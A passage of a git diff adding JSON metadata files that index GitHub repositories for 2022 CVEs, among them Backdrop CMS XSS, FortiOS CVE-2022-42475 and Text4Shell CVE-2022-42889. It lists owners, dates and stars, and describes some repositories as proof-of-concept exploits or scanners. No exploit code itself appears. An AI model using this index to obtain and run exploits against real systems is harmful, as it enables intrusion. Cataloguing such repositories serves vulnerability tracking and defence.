{ + "login": "bypazs", + "id": 5837953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837953?v=4", + "html_url": "https:\/\/github.com\/bypazs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bypazs\/CVE-2022-42094", + "description": "Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Card content.", + "fork": false, + "created_at": "2022-09-27T11:56:30Z", + "updated_at": "2022-11-01T07:19:44Z", + "pushed_at": "2022-10-31T14:35:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42095.json b/2022/CVE-2022-42095.json new file mode 100644 index 0000000000..0174607185 --- /dev/null +++ b/2022/CVE-2022-42095.json @@ -0,0 +1,33 @@ +[ + { + "id": 542070850, + "name": "CVE-2022-42095", + "full_name": "bypazs\/CVE-2022-42095", + "owner": { + "login": "bypazs", + "id": 5837953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837953?v=4", + "html_url": "https:\/\/github.com\/bypazs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bypazs\/CVE-2022-42095", + "description": "Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Page content.", + "fork": false, + "created_at": "2022-09-27T12:23:26Z", + "updated_at": "2022-11-23T16:15:06Z", + "pushed_at": "2022-09-27T12:26:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42096.json b/2022/CVE-2022-42096.json new file mode 100644 index 0000000000..ebf60f19e4 --- /dev/null +++ b/2022/CVE-2022-42096.json @@ -0,0 +1,33 @@ +[ + { + "id": 542072961, + "name": "CVE-2022-42096", + "full_name": "bypazs\/CVE-2022-42096", + "owner": { + "login": "bypazs", + "id": 5837953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837953?v=4", + "html_url": "https:\/\/github.com\/bypazs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bypazs\/CVE-2022-42096", + "description": "Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Post content.", + "fork": false, + "created_at": "2022-09-27T12:28:13Z", + "updated_at": "2022-11-01T07:19:50Z", + "pushed_at": "2022-10-31T14:50:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42097.json b/2022/CVE-2022-42097.json new file mode 100644 index 0000000000..7988578d00 --- /dev/null +++ b/2022/CVE-2022-42097.json @@ -0,0 +1,33 @@ +[ + { + "id": 542075338, + "name": "CVE-2022-42097", + "full_name": "bypazs\/CVE-2022-42097", + "owner": { + "login": "bypazs", + "id": 5837953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837953?v=4", + "html_url": "https:\/\/github.com\/bypazs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bypazs\/CVE-2022-42097", + "description": "Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the comment.", + "fork": false, + "created_at": "2022-09-27T12:33:10Z", + "updated_at": "2022-11-01T07:19:55Z", + "pushed_at": "2022-10-31T14:56:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42098.json b/2022/CVE-2022-42098.json new file mode 100644 index 0000000000..9e77e9df77 --- /dev/null +++ b/2022/CVE-2022-42098.json @@ -0,0 +1,33 @@ +[ + { + "id": 542505822, + "name": "CVE-2022-42098", + "full_name": "bypazs\/CVE-2022-42098", + "owner": { + "login": "bypazs", + "id": 5837953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5837953?v=4", + "html_url": "https:\/\/github.com\/bypazs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bypazs\/CVE-2022-42098", + "description": "KLiK-SocialMediaWebsite v1.0.1 has SQL Injection Vulnerabilities at profile.php", + "fork": false, + "created_at": "2022-09-28T09:19:53Z", + "updated_at": "2022-11-01T07:20:03Z", + "pushed_at": "2022-10-31T15:01:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42176.json b/2022/CVE-2022-42176.json new file mode 100644 index 0000000000..204ae049ff --- /dev/null +++ b/2022/CVE-2022-42176.json @@ -0,0 +1,33 @@ +[ + { + "id": 560664396, + "name": "CVE-2022-42176", + "full_name": "soy-oreocato\/CVE-2022-42176", + "owner": { + "login": "soy-oreocato", + "id": 79870826, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79870826?v=4", + "html_url": "https:\/\/github.com\/soy-oreocato", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/soy-oreocato\/CVE-2022-42176", + "description": null, + "fork": false, + "created_at": "2022-11-02T01:39:49Z", + "updated_at": "2022-11-04T15:03:34Z", + "pushed_at": "2024-03-28T21:40:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42475.json b/2022/CVE-2022-42475.json new file mode 100644 index 0000000000..020c0b8915 --- /dev/null +++ b/2022/CVE-2022-42475.json @@ -0,0 +1,223 @@ +[ + { + "id": 590172933, + "name": "ioc-cve-2022-42475", + "full_name": "bryanster\/ioc-cve-2022-42475", + "owner": { + "login": "bryanster", + "id": 45668775, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45668775?v=4", + "html_url": "https:\/\/github.com\/bryanster", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bryanster\/ioc-cve-2022-42475", + "description": "test for the ioc described for FG-IR-22-398", + "fork": false, + "created_at": "2023-01-17T20:11:04Z", + "updated_at": "2023-05-14T12:04:07Z", + "pushed_at": "2023-05-14T13:22:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-42475", + "fortigate-firewall", + "fortinet" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 605510069, + "name": "cve-2022-42475", + "full_name": "scrt\/cve-2022-42475", + "owner": { + "login": "scrt", + "id": 5999514, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5999514?v=4", + "html_url": "https:\/\/github.com\/scrt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scrt\/cve-2022-42475", + "description": "POC code to exploit the Heap overflow in Fortinet's SSLVPN daemon", + "fork": false, + "created_at": "2023-02-23T10:04:58Z", + "updated_at": "2024-08-12T20:29:57Z", + "pushed_at": "2023-03-14T08:41:51Z", + "stargazers_count": 104, + "watchers_count": 104, + "has_discussions": false, + "forks_count": 28, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 28, + "watchers": 104, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 614608660, + "name": "cve-2022-42475", + "full_name": "Amir-hy\/cve-2022-42475", + "owner": { + "login": "Amir-hy", + "id": 24714998, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24714998?v=4", + "html_url": "https:\/\/github.com\/Amir-hy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Amir-hy\/cve-2022-42475", + "description": "FortiOS buffer overflow vulnerability", + "fork": false, + "created_at": "2023-03-16T00:05:30Z", + "updated_at": "2023-06-14T15:03:16Z", + "pushed_at": "2023-03-16T00:05:33Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 617289614, + "name": "cve-2022-42475-Fortinet", + "full_name": "Mustafa1986\/cve-2022-42475-Fortinet", + "owner": { + "login": "Mustafa1986", + "id": 27927358, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27927358?v=4", + "html_url": "https:\/\/github.com\/Mustafa1986", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mustafa1986\/cve-2022-42475-Fortinet", + "description": null, + "fork": false, + "created_at": "2023-03-22T04:26:22Z", + "updated_at": "2023-03-22T04:27:35Z", + "pushed_at": "2023-03-22T04:27:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 617811153, + "name": "CVE-2022-42475-RCE-POC", + "full_name": "3yujw7njai\/CVE-2022-42475-RCE-POC", + "owner": { + "login": "3yujw7njai", + "id": 7390055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4", + "html_url": "https:\/\/github.com\/3yujw7njai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3yujw7njai\/CVE-2022-42475-RCE-POC", + "description": "CVE-2022-42475 飞塔RCE漏洞 POC", + "fork": false, + "created_at": "2023-03-23T06:48:14Z", + "updated_at": "2024-06-26T01:15:25Z", + "pushed_at": "2023-03-23T06:59:22Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 633227706, + "name": "cve-2022-42475", + "full_name": "natceil\/cve-2022-42475", + "owner": { + "login": "natceil", + "id": 62095406, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62095406?v=4", + "html_url": "https:\/\/github.com\/natceil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/natceil\/cve-2022-42475", + "description": null, + "fork": false, + "created_at": "2023-04-27T03:47:14Z", + "updated_at": "2023-04-27T03:51:54Z", + "pushed_at": "2023-04-27T04:20:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 656889059, + "name": "CVE-2022-42475", + "full_name": "0xhaggis\/CVE-2022-42475", + "owner": { + "login": "0xhaggis", + "id": 6735009, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6735009?v=4", + "html_url": "https:\/\/github.com\/0xhaggis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xhaggis\/CVE-2022-42475", + "description": "An exploit for CVE-2022-42475, a pre-authentication heap overflow in Fortinet networking products", + "fork": false, + "created_at": "2023-06-21T21:22:35Z", + "updated_at": "2024-07-03T03:26:32Z", + "pushed_at": "2023-06-21T21:24:52Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 31, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4262.json b/2022/CVE-2022-4262.json new file mode 100644 index 0000000000..47459cf69d --- /dev/null +++ b/2022/CVE-2022-4262.json @@ -0,0 +1,95 @@ +[ + { + "id": 665996378, + "name": "CVE-2022-4262", + "full_name": "bjrjk\/CVE-2022-4262", + "owner": { + "login": "bjrjk", + "id": 6657270, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6657270?v=4", + "html_url": "https:\/\/github.com\/bjrjk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bjrjk\/CVE-2022-4262", + "description": "Full Chain Analysis of CVE-2022-4262, a non-trivial feedback slot type confusion in V8.", + "fork": false, + "created_at": "2023-07-13T13:17:20Z", + "updated_at": "2024-11-13T16:20:32Z", + "pushed_at": "2024-09-04T02:10:57Z", + "stargazers_count": 96, + "watchers_count": 96, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 96, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 747666381, + "name": "CVE-2022-4262", + "full_name": "mistymntncop\/CVE-2022-4262", + "owner": { + "login": "mistymntncop", + "id": 105329747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105329747?v=4", + "html_url": "https:\/\/github.com\/mistymntncop", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mistymntncop\/CVE-2022-4262", + "description": null, + "fork": false, + "created_at": "2024-01-24T11:58:54Z", + "updated_at": "2024-09-26T14:02:29Z", + "pushed_at": "2024-01-29T22:03:03Z", + "stargazers_count": 59, + "watchers_count": 59, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 59, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 756021648, + "name": "CVE-2022-4262", + "full_name": "quangnh89\/CVE-2022-4262", + "owner": { + "login": "quangnh89", + "id": 10832563, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10832563?v=4", + "html_url": "https:\/\/github.com\/quangnh89", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/quangnh89\/CVE-2022-4262", + "description": null, + "fork": false, + "created_at": "2024-02-11T18:53:05Z", + "updated_at": "2024-02-11T18:53:05Z", + "pushed_at": "2024-02-11T18:53:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42703.json b/2022/CVE-2022-42703.json new file mode 100644 index 0000000000..fa9e08a1bd --- /dev/null +++ b/2022/CVE-2022-42703.json @@ -0,0 +1,64 @@ +[ + { + "id": 661279501, + "name": "hbp-attack-demo", + "full_name": "Squirre17\/hbp-attack-demo", + "owner": { + "login": "Squirre17", + "id": 79578430, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79578430?v=4", + "html_url": "https:\/\/github.com\/Squirre17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Squirre17\/hbp-attack-demo", + "description": "Linux kernel hbp exploit method demo. (i.e. the degradation version of CVE-2022-42703)", + "fork": false, + "created_at": "2023-07-02T10:58:46Z", + "updated_at": "2024-09-27T02:27:31Z", + "pushed_at": "2023-07-02T12:59:37Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 701197900, + "name": "linux-4.1.15_CVE-2022-42703", + "full_name": "Satheesh575555\/linux-4.1.15_CVE-2022-42703", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/linux-4.1.15_CVE-2022-42703", + "description": null, + "fork": false, + "created_at": "2023-10-06T06:18:32Z", + "updated_at": "2023-10-06T06:32:33Z", + "pushed_at": "2023-10-06T07:36:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42864.json b/2022/CVE-2022-42864.json new file mode 100644 index 0000000000..90f6ef177f --- /dev/null +++ b/2022/CVE-2022-42864.json @@ -0,0 +1,33 @@ +[ + { + "id": 591057092, + "name": "CVE-2022-42864", + "full_name": "Muirey03\/CVE-2022-42864", + "owner": { + "login": "Muirey03", + "id": 31448720, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31448720?v=4", + "html_url": "https:\/\/github.com\/Muirey03", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Muirey03\/CVE-2022-42864", + "description": "Proof-of-concept for the CVE-2022-42864 IOHIDFamily race condition", + "fork": false, + "created_at": "2023-01-19T20:36:49Z", + "updated_at": "2024-12-10T13:34:01Z", + "pushed_at": "2023-01-20T17:58:39Z", + "stargazers_count": 64, + "watchers_count": 64, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 64, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42889.json b/2022/CVE-2022-42889.json new file mode 100644 index 0000000000..9d2ddb319b --- /dev/null +++ b/2022/CVE-2022-42889.json @@ -0,0 +1,1441 @@ +[ + { + "id": 553123200, + "name": "CVE-2022-42889-PoC", + "full_name": "SeanWrightSec\/CVE-2022-42889-PoC", + "owner": { + "login": "SeanWrightSec", + "id": 41480796, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41480796?v=4", + "html_url": "https:\/\/github.com\/SeanWrightSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SeanWrightSec\/CVE-2022-42889-PoC", + "description": "Proof of Concept for the Apache commons-text vulnerability CVE-2022-42889.", + "fork": false, + "created_at": "2022-10-17T18:50:36Z", + "updated_at": "2024-09-21T09:42:47Z", + "pushed_at": "2022-10-20T11:56:13Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": true, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-42889", + "cve-2022-42889-expliot", + "cybersecurity", + "poc" + ], + "visibility": "public", + "forks": 17, + "watchers": 34, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 553199087, + "name": "text4shell-policy", + "full_name": "chainguard-dev\/text4shell-policy", + "owner": { + "login": "chainguard-dev", + "id": 87436699, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87436699?v=4", + "html_url": "https:\/\/github.com\/chainguard-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chainguard-dev\/text4shell-policy", + "description": "ClusterImagePolicy demo for cve-2022-42889 text4shell ", + "fork": false, + "created_at": "2022-10-17T21:49:13Z", + "updated_at": "2024-03-10T21:00:23Z", + "pushed_at": "2023-06-21T11:06:51Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": true, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 553446275, + "name": "commons-text-goat", + "full_name": "tulhan\/commons-text-goat", + "owner": { + "login": "tulhan", + "id": 586439, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/586439?v=4", + "html_url": "https:\/\/github.com\/tulhan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tulhan\/commons-text-goat", + "description": "An intentionally vulnerable webapp to get your hands dirty with CVE-2022-42889.", + "fork": false, + "created_at": "2022-10-18T08:22:55Z", + "updated_at": "2022-10-23T11:42:26Z", + "pushed_at": "2023-04-18T22:24:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 553496497, + "name": "cve-2022-42889-text4shell-docker", + "full_name": "karthikuj\/cve-2022-42889-text4shell-docker", + "owner": { + "login": "karthikuj", + "id": 59091280, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59091280?v=4", + "html_url": "https:\/\/github.com\/karthikuj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/karthikuj\/cve-2022-42889-text4shell-docker", + "description": "Dockerized POC for CVE-2022-42889 Text4Shell", + "fork": false, + "created_at": "2022-10-18T09:58:00Z", + "updated_at": "2024-12-11T23:18:37Z", + "pushed_at": "2022-11-14T17:12:41Z", + "stargazers_count": 75, + "watchers_count": 75, + "has_discussions": false, + "forks_count": 32, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "act4shell", + "apache", + "commons", + "cve", + "cve-2022-42889", + "poc", + "text4shell" + ], + "visibility": "public", + "forks": 32, + "watchers": 75, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 553621408, + "name": "cve-2022-42889", + "full_name": "ClickCyber\/cve-2022-42889", + "owner": { + "login": "ClickCyber", + "id": 66947475, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66947475?v=4", + "html_url": "https:\/\/github.com\/ClickCyber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ClickCyber\/cve-2022-42889", + "description": "cve-2022-42889 Text4Shell CVE-2022-42889 affects Apache Commons Text versions 1.5 through 1.9. It has been patched as of Commons Text version 1.10. ", + "fork": false, + "created_at": "2022-10-18T13:53:55Z", + "updated_at": "2024-12-30T08:07:38Z", + "pushed_at": "2022-10-18T14:10:07Z", + "stargazers_count": 39, + "watchers_count": 39, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 39, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 553879048, + "name": "CVE-2022-42889-POC", + "full_name": "korteke\/CVE-2022-42889-POC", + "owner": { + "login": "korteke", + "id": 2558348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2558348?v=4", + "html_url": "https:\/\/github.com\/korteke", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/korteke\/CVE-2022-42889-POC", + "description": "A simple application that shows how to exploit the CVE-2022-42889 vulnerability", + "fork": false, + "created_at": "2022-10-18T23:15:40Z", + "updated_at": "2024-10-11T23:57:40Z", + "pushed_at": "2022-11-06T16:03:44Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-42889", + "cybersecurity", + "exploit", + "interactsh", + "poc", + "text4shell" + ], + "visibility": "public", + "forks": 7, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 553930045, + "name": "CVE-2022-42889", + "full_name": "rockmelodies\/CVE-2022-42889", + "owner": { + "login": "rockmelodies", + "id": 24653177, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24653177?v=4", + "html_url": "https:\/\/github.com\/rockmelodies", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rockmelodies\/CVE-2022-42889", + "description": "CVE-2022-42889 dockerized sample application (Apache Commons Text RCE)", + "fork": false, + "created_at": "2022-10-19T01:45:40Z", + "updated_at": "2022-10-18T12:35:44Z", + "pushed_at": "2022-10-17T16:09:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 554046000, + "name": "cve-2022-42889-check", + "full_name": "eunomie\/cve-2022-42889-check", + "owner": { + "login": "eunomie", + "id": 1542321, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1542321?v=4", + "html_url": "https:\/\/github.com\/eunomie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eunomie\/cve-2022-42889-check", + "description": null, + "fork": false, + "created_at": "2022-10-19T06:54:57Z", + "updated_at": "2022-10-19T06:57:07Z", + "pushed_at": "2022-10-20T12:54:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 554185839, + "name": "CVE-2022-42889-text4shell", + "full_name": "kljunowsky\/CVE-2022-42889-text4shell", + "owner": { + "login": "kljunowsky", + "id": 104329412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104329412?v=4", + "html_url": "https:\/\/github.com\/kljunowsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kljunowsky\/CVE-2022-42889-text4shell", + "description": "Apache commons text - CVE-2022-42889 Text4Shell proof of concept exploit.", + "fork": false, + "created_at": "2022-10-19T11:49:08Z", + "updated_at": "2024-12-14T14:32:17Z", + "pushed_at": "2023-12-29T14:57:34Z", + "stargazers_count": 56, + "watchers_count": 56, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "bug-bounty", + "bug-bounty-hunting", + "bugbounty", + "bugbounty-tool", + "commons-text", + "cve-2022-42889", + "exploit", + "oneliner", + "security", + "security-tools" + ], + "visibility": "public", + "forks": 9, + "watchers": 56, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 554436866, + "name": "text4shell-scan", + "full_name": "securekomodo\/text4shell-scan", + "owner": { + "login": "securekomodo", + "id": 4809643, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4809643?v=4", + "html_url": "https:\/\/github.com\/securekomodo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/securekomodo\/text4shell-scan", + "description": "A fully automated, accurate, and extensive scanner for finding text4shell RCE CVE-2022-42889", + "fork": false, + "created_at": "2022-10-19T20:14:22Z", + "updated_at": "2024-12-11T23:46:43Z", + "pushed_at": "2022-10-20T12:51:08Z", + "stargazers_count": 51, + "watchers_count": 51, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 51, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 554494424, + "name": "CVE-2022-42889", + "full_name": "neerazz\/CVE-2022-42889", + "owner": { + "login": "neerazz", + "id": 43318996, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43318996?v=4", + "html_url": "https:\/\/github.com\/neerazz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/neerazz\/CVE-2022-42889", + "description": null, + "fork": false, + "created_at": "2022-10-19T22:56:12Z", + "updated_at": "2022-10-19T22:59:21Z", + "pushed_at": "2022-10-19T22:58:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-42889", + "cve-2022-42889-expliot", + "cve-poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 554822047, + "name": "cve-2022-42889-intercept", + "full_name": "uk0\/cve-2022-42889-intercept", + "owner": { + "login": "uk0", + "id": 19545292, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19545292?v=4", + "html_url": "https:\/\/github.com\/uk0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uk0\/cve-2022-42889-intercept", + "description": "通过 jvm 启动参数 以及 jps pid进行拦截非法参数", + "fork": false, + "created_at": "2022-10-20T13:05:24Z", + "updated_at": "2024-12-12T14:31:34Z", + "pushed_at": "2022-10-21T03:46:50Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-42889" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 554968542, + "name": "text4shell-poc", + "full_name": "securekomodo\/text4shell-poc", + "owner": { + "login": "securekomodo", + "id": 4809643, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4809643?v=4", + "html_url": "https:\/\/github.com\/securekomodo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/securekomodo\/text4shell-poc", + "description": "Proof of Concept Appliction for testing CVE-2022-42889", + "fork": false, + "created_at": 